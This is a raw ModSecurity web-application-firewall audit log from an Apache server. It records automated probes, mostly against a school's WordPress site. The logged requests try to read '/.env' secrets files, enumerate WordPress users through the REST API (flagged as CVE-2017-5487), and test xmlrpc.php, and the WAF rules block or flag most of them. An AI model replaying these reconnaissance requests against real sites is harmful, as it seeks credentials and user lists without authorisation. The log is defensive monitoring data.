Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00ff1376-Z-- --ca7ab314-A-- [08/May/2025:14:03:47 +0700] aBxXU8P9GxxPAbCroFbNcgAAAFQ 103.236.140.4 45282 103.236.140.4 8181 --ca7ab314-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 204.48.19.8 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 204.48.19.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; XBLWP7; ZuneWP7) UCBrowser/2.9.0.263 Accept-Charset: utf-8 --ca7ab314-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca7ab314-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746687827773100 839 (- - -) Stopwatch2: 1746687827773100 839; combined=366, p1=323, p2=0, p3=0, p4=0, p5=43, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca7ab314-Z-- --89252e28-A-- [08/May/2025:14:03:53 +0700] aBxXWacs1DvJ_HgMHE_ysQAAAAc 103.236.140.4 45284 103.236.140.4 8181 --89252e28-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 204.48.19.8 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 204.48.19.8 X-Forwarded-Proto: https Connection: close User-Agent: iTunes/9.0.2 (Windows; N) Accept-Charset: utf-8 --89252e28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89252e28-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746687833037942 853 (- - -) Stopwatch2: 1746687833037942 853; combined=363, p1=319, p2=0, p3=0, p4=0, p5=44, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89252e28-Z-- --1434520e-A-- [08/May/2025:14:38:13 +0700] aBxfZacs1DvJ_HgMHE8GPQAAABU 103.236.140.4 53874 103.236.140.4 8181 --1434520e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1434520e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1434520e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746689893257585 2964 (- - -) Stopwatch2: 1746689893257585 2964; combined=1384, p1=440, p2=881, p3=0, p4=0, p5=54, sr=72, sw=9, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1434520e-Z-- --d680be59-A-- [08/May/2025:14:38:30 +0700] aBxfdqcs1DvJ_HgMHE8GgQAAAAc 103.236.140.4 54594 103.236.140.4 8181 --d680be59-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d680be59-C-- demo.sayHello --d680be59-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d680be59-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746689910789399 5830 (- - -) Stopwatch2: 1746689910789399 5830; combined=4334, p1=558, p2=3564, p3=30, p4=34, p5=88, sr=75, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d680be59-Z-- --a6410418-A-- [08/May/2025:14:40:53 +0700] aBxgBY4K347NtBcwXKwZSAAAAJc 103.236.140.4 60410 103.236.140.4 8181 --a6410418-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 209.38.248.17 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 209.38.248.17 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --a6410418-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6410418-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746690053271062 803 (- - -) Stopwatch2: 1746690053271062 803; combined=332, p1=293, p2=0, p3=0, p4=0, p5=39, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6410418-Z-- --7887b735-A-- [08/May/2025:14:42:12 +0700] aBxgVKcs1DvJ_HgMHE8JQAAAAAU 103.236.140.4 35402 103.236.140.4 8181 --7887b735-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7887b735-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7887b735-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746690132021621 2830 (- - -) Stopwatch2: 1746690132021621 2830; combined=1253, p1=435, p2=787, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7887b735-Z-- --57075771-A-- [08/May/2025:14:42:19 +0700] aBxgW8P9GxxPAbCroFbeIwAAAEo 103.236.140.4 35696 103.236.140.4 8181 --57075771-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --57075771-C-- demo.sayHello --57075771-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --57075771-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746690139046980 4563 (- - -) Stopwatch2: 1746690139046980 4563; combined=3105, p1=418, p2=2520, p3=27, p4=28, p5=65, sr=49, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57075771-Z-- --bf58e775-A-- [08/May/2025:14:42:33 +0700] aBxgaSs5rYyn3jlLjjLPFgAAANA 103.236.140.4 36288 103.236.140.4 8181 --bf58e775-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.196 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bf58e775-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf58e775-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746690153071538 2153 (- - -) Stopwatch2: 1746690153071538 2153; combined=1155, p1=409, p2=719, p3=0, p4=0, p5=27, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf58e775-Z-- --27d7ac18-A-- [08/May/2025:14:42:36 +0700] aBxgbCs5rYyn3jlLjjLPFwAAAM0 103.236.140.4 36428 103.236.140.4 8181 --27d7ac18-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 119.40.90.85 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.40.90.85 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --27d7ac18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27d7ac18-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746690156563017 3029 (- - -) Stopwatch2: 1746690156563017 3029; combined=1289, p1=425, p2=835, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27d7ac18-Z-- --bfea2d33-A-- [08/May/2025:14:42:42 +0700] aBxgco4K347NtBcwXKwaagAAAIE 103.236.140.4 36662 103.236.140.4 8181 --bfea2d33-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.196 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bfea2d33-C-- demo.sayHello --bfea2d33-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfea2d33-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746690162387503 5273 (- - -) Stopwatch2: 1746690162387503 5273; combined=3902, p1=482, p2=3218, p3=28, p4=32, p5=83, sr=60, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfea2d33-Z-- --f006d458-A-- [08/May/2025:14:44:17 +0700] aBxg0cP9GxxPAbCroFbfVAAAAFY 103.236.140.4 40508 103.236.140.4 8181 --f006d458-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.202 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.202 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f006d458-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f006d458-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746690257009584 2506 (- - -) Stopwatch2: 1746690257009584 2506; combined=1465, p1=459, p2=974, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f006d458-Z-- --a986a804-A-- [08/May/2025:14:44:24 +0700] aBxg2Kcs1DvJ_HgMHE8LGwAAAAE 103.236.140.4 40824 103.236.140.4 8181 --a986a804-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.202 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.202 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a986a804-C-- demo.sayHello --a986a804-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a986a804-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746690264619261 5299 (- - -) Stopwatch2: 1746690264619261 5299; combined=3895, p1=447, p2=3254, p3=25, p4=28, p5=86, sr=59, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a986a804-Z-- --16c39a5d-A-- [08/May/2025:14:44:36 +0700] aBxg5MP9GxxPAbCroFbfdgAAAEo 103.236.140.4 41324 103.236.140.4 8181 --16c39a5d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.207 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.207 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --16c39a5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16c39a5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746690276815301 2588 (- - -) Stopwatch2: 1746690276815301 2588; combined=1056, p1=337, p2=693, p3=0, p4=0, p5=26, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16c39a5d-Z-- --4dbbe708-A-- [08/May/2025:14:44:45 +0700] aBxg7cP9GxxPAbCroFbfkgAAAFM 103.236.140.4 41676 103.236.140.4 8181 --4dbbe708-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.207 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.207 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4dbbe708-C-- demo.sayHello --4dbbe708-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4dbbe708-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746690285216110 4940 (- - -) Stopwatch2: 1746690285216110 4940; combined=3499, p1=514, p2=2811, p3=25, p4=28, p5=71, sr=55, sw=50, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4dbbe708-Z-- --637e8266-A-- [08/May/2025:14:44:45 +0700] aBxg7cP9GxxPAbCroFbfkwAAAEQ 103.236.140.4 41694 103.236.140.4 8181 --637e8266-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --637e8266-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --637e8266-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746690285578714 2029 (- - -) Stopwatch2: 1746690285578714 2029; combined=889, p1=306, p2=561, p3=0, p4=0, p5=22, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --637e8266-Z-- --c6301a71-A-- [08/May/2025:14:44:53 +0700] aBxg9Ss5rYyn3jlLjjLQFwAAAMM 103.236.140.4 42048 103.236.140.4 8181 --c6301a71-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.38 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c6301a71-C-- demo.sayHello --c6301a71-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6301a71-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746690293553499 5054 (- - -) Stopwatch2: 1746690293553499 5054; combined=3666, p1=454, p2=3034, p3=27, p4=27, p5=76, sr=59, sw=48, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6301a71-Z-- --5126fe41-A-- [08/May/2025:14:44:57 +0700] aBxg-Y4K347NtBcwXKwbswAAAIY 103.236.140.4 42226 103.236.140.4 8181 --5126fe41-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5126fe41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5126fe41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746690297630205 2126 (- - -) Stopwatch2: 1746690297630205 2126; combined=942, p1=354, p2=558, p3=0, p4=0, p5=29, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
